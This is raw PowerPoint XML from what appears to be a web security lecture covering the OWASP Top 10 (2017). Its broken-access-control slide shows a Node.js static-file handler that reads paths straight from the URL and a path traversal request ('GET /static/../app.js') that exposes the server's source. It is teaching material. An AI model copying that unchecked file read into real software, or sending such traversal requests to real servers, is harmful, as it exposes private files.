            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1640C4B-3F2C-47AB-B188-DC73346D5FE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1389558"/>
            <a:ext cx="10515600" cy="386900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003865"/>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myServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http.createServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003865"/>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 res){</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if</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req.url.startsWith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>("/static/"){</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path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>req.url.substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(1)</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fs.readFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(path, 'utf8',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(err, content){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res.end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(content)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i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  // ...</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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{517F0236-1BF1-4E9B-86BC-5C3E1D88973D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9946640" y="3420567"/>
            <a:ext cx="2133600" cy="2047875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B92761B3-0657-43EB-A64D-95BFE10D24F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5529420"/>
            <a:ext cx="4117339" cy="412749"/>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solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /static/layout.css</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A45ED88-8A27-4F04-A935-656489F0CA23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="6231155"/>
            <a:ext cx="4117339" cy="40549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solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET /static/../app.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B7E01E3-18D4-4888-ADA5-691688B92530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135880" y="5523150"/>
            <a:ext cx="5877560" cy="432939"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/static/layout.css</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E233D2BC-9FAD-4055-B3FC-6C8345DE4D7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5135880" y="6254246"/>
            <a:ext cx="3459480" cy="43293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solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/app.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108519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5" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="9" grpId="0" build="p"/>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4000" noProof="0" dirty="0"/>
              <a:t>#5 Broken Access Control example</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885371"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Bank Job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://boris.in/blog/2016/the-bank-job/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="203378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947400" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" noProof="0" dirty="0"/>
              <a:t>Common security vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0AD3687-270A-4A78-924A-14CE6E6D5650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="1273169"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>The Open Web Application Security Project</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> published 2017</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>The Ten Most Critical Web Application Security Risks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="95000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B23892FD-E1AF-485F-AC02-FCDF7D0C2F17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1134209116"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1330960" y="3429000"/>
          <a:ext cx="3688080" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="528320">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4079308891"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3159760">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3744235335"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>#</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Security Risk</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4192030285"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>1</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0"/>
                        <a:t>Injection</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2357905415"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0"/>
                        <a:t>Broken Authentication</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3464275415"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0"/>
                        <a:t>Sensitive Data Exposure</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="609449363"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>4</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>XML External Entities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2104882706"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>5</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0"/>
                        <a:t>Broken Access Control</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4186339833"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="28" name="Table 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{788DB990-C570-471E-870B-0AF620CCCBB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4115513458"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5323840" y="3429000"/>
          <a:ext cx="5659120" cy="2225040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="467360">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4079308891"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="5191760">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3744235335"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>#</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Security Risk</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4192030285"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>6</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0"/>
                        <a:t>Security Misconfiguration</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2357905415"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" b="0" dirty="0"/>
                        <a:t>Cross-Site Scripting</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3464275415"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>8</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Insecure Deserialization</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="609449363"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>9</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Using Components with Known Vulnerabilities</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2104882706"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>10</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Insufficient Logging &amp; Monitoring</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4186339833"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137231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4000" noProof="0" dirty="0"/>
              <a:t>#6 Security Misconfiguration</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3194721"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24262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4000" noProof="0" dirty="0"/>
              <a:t>#6 Security Misconfiguration</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480131"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
